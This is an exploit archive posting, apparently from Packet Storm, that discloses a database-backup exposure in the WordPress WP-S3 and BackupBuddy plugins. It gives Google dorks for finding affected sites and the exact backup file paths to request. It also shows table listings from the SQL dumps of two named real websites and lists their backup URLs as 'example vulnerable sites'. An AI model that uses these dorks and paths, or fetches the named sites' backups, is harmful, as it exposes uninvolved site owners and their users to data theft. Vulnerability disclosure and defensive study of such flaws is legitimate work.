exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Ithemes-BackupBuddy Amazon WP-S3 2.9 Database Disclosure

WordPress Ithemes-BackupBuddy Amazon WP-S3 2.9 Database Disclosure
Posted Dec 17, 2018
Authored by KingSkrupellos

WordPress Ithemes-BackupBuddy Amazon WP-S3 plugin version 2.9 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | 776ea1da0e8e3b190a85600d0d9a6783904a097c343499e68a6207fadc499a14

WordPress Ithemes-BackupBuddy Amazon WP-S3 2.9 Database Disclosure

Change Mirror Download
#################################################################################################

# Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9
Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 17/12/2018
# Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~
wordpress.org/plugins/wp-s3/
# Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''
+ intext:''Powered by Shopify''
+ intext:A(c) 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal
Development Powered by Shopify''
+ intext:''2015 A(c) ALL RIGHTS RESERVED BY THE-SCHMIDT''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/uploads/wp-s3-database-backup.sql

/wp-content/uploads/wp-s3-backups.zip

#################################################################################################

# Example SQL Dump Some Informations and Tables Names => holysparks.org

-- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: raeshaga_wrd1
-- ------------------------------------------------------
-- Server version 5.1.58-community-log

-- Table structure for table `wp_StreamPad_Tracks`

-- Dumping data for table `wp_StreamPad_Tracks`

-- Table structure for table `wp_affiliates_banners_tbl`

-- Dumping data for table `wp_affiliates_banners_tbl`

-- Table structure for table `wp_affiliates_clickthroughs_tbl`

-- Dumping data for table `wp_affiliates_clickthroughs_tbl`

-- Table structure for table `wp_affiliates_leads_tbl`

-- Dumping data for table `wp_affiliates_leads_tbl`

-- Table structure for table `wp_affiliates_payouts_tbl`

-- Dumping data for table `wp_affiliates_payouts_tbl`

-- Table structure for table `wp_affiliates_sales_tbl`

-- Dumping data for table `wp_affiliates_sales_tbl`

-- Table structure for table `wp_affiliates_tbl`

-- Dumping data for table `wp_affiliates_tbl`

-- Table structure for table `wp_commentmeta`

-- Dumping data for table `wp_commentmeta`

-- Table structure for table `wp_comments`

-- Dumping data for table `wp_comments`

-- Table structure for table `wp_contact_form_7`

-- Dumping data for table `wp_contact_form_7`

-- Table structure for table `wp_ft_wpecards`

-- Dumping data for table `wp_ft_wpecards`

-- Table structure for table `wp_links`

-- Dumping data for table `wp_links`

-- Table structure for table `wp_options`

-- Dumping data for table `wp_options`

-- Dump completed....

################################################################################################

# Example SQL Dump Informations and Tables Names => the-schmidt.com

-- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: theschm1_blog
-- ------------------------------------------------------
-- Server version 5.1.60-community-log

-- Table structure for table `wp_PluginManager`

-- Dumping data for table `wp_PluginManager`

-- Table structure for table `wp_custom_fonts`

-- Dumping data for table `wp_custom_fonts`

-- Table structure for table `wp_cvg_gallery`

-- Dumping data for table `wp_cvg_gallery`

-- Table structure for table `wp_cvg_videos`

-- Dumping data for table `wp_cvg_videos`

-- Table structure for table `wp_download_status`

-- Dumping data for table `wp_download_status`

-- Table structure for table `wp_fancybox`

-- Dumping data for table `wp_fancybox`

-- Table structure for table `wp_item_category_associations`

-- Dumping data for table `wp_item_category_associations`

-- Table structure for table `wp_links`

-- Dumping data for table `wp_links`

-- Table structure for table `wp_ngg_album`

-- Dumping data for table `wp_ngg_album`

-- Table structure for table `wp_ngg_gallery`

-- Dumping data for table `wp_ngg_gallery`

-- Table structure for table `wp_ngg_pictures`

-- Dumping data for table `wp_ngg_pictures`

-- Table structure for table `wp_also_bought_product`

-- Dumping data for table `wp_also_bought_product`

-- Table structure for table `wp_blc_filters`

-- Dumping data for table `wp_blc_filters`

-- Table structure for table `wp_blc_instances`

-- Dumping data for table `wp_blc_instances`

-- Table structure for table `wp_blc_links`

-- Dumping data for table `wp_blc_links`

-- Table structure for table `wp_options`

-- Dumping data for table `wp_options`

-- Dump completed...

#################################################################################################

# Example Vulnerable Sites =>

[+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql

[+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close